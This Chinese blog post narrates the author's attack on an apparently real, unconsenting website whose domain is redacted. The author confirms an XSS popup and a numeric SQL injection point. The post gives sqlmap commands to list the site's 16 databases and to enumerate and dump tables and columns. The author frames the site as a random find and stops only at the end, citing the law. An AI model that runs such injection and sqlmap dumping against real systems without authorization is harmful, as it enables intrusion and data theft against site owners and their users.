记录一次简单的web实战

盛年不重来,一日难再晨
在茫茫大海中,终于等到了你的到来!
在不断的搜索中,终于找到了一个“可爱啊”的网站,现在准备开饭了!

记录一次简单的web实战

在这就绕过信息收集这个步骤了,在初步拿到这个网站时,首先要注意网站的结构,server之类的。
BEGIN

在网站代码后面输入JaveaScript测试代码 ;出现弹窗,证明存在一个小的XSS,是否存在更多的XSS漏洞信息,以后再做补充。

记录一次简单的web实战

除此之后,我们对其他漏洞页进去了测试,结果居然有了!!!

记录一次简单的web实战

可以发现,存在数字型的SQL注入点;于是用了传统的方法对网站进行了sql测试

http://www.xxxxxx.net/main.php?id=35 and 1=1 ;http://www.xxxxx.net/main.php?id=35 or 1=1

记录一次简单的web实战

虽然输入这个判断其可能存在注入点,但是还是需要进一步测试

现在我们用kali中的sqlmap进行扫描;

sqlmap -u http://www.xxxxxx.net/main.php?id=35

记录一次简单的web实战

从扫描的结果可以知道,数据库为Mysql,Apach版本为2.0.47,PHP版本为5.1.4,属于高版本,由前面的知识点可以判定肯定存在'information_schema'这个数据库;

接下来,我们将查询该网站可能存在的其他数据库

sqlmap -u http://www.xxxxx.net/main.php?id=35 --dbs

记录一次简单的web实战

我们可以看到,这个网站存在16个数据库,其中应该有我们想要看的东西(切记 只能看,不能改哟)

于是我进入到了刚才提到的‘information_schema'这个数据库中

第一:查看该数据库的所有表名 sqlmap -u http://www.xxxxx/main.php?id=35 -D information_schema --tables

记录一次简单的web实战

第二:选择其中一个表,查看其字段 qlmap -u http://www.xxxxxx.net/main.php?id=35 -D information_schema -T TABLES --columns

记录一次简单的web实战

第三:查看字段中的数据值 sqlmap -u http://www.xxxx.net/main.php?id=35 -Dinformation_schema -C TABLE_NAME -dump

记录一次简单的web实战

记录一次简单的web实战

既然这个网站存在一些漏洞,我们也得遵守法律,也就到这儿吧!

上一篇:35岁以上的Android开发,都去了哪儿?,flutter环境搭建


下一篇:45岁程序员,精通各种技术体系,却连个面试机会都没有…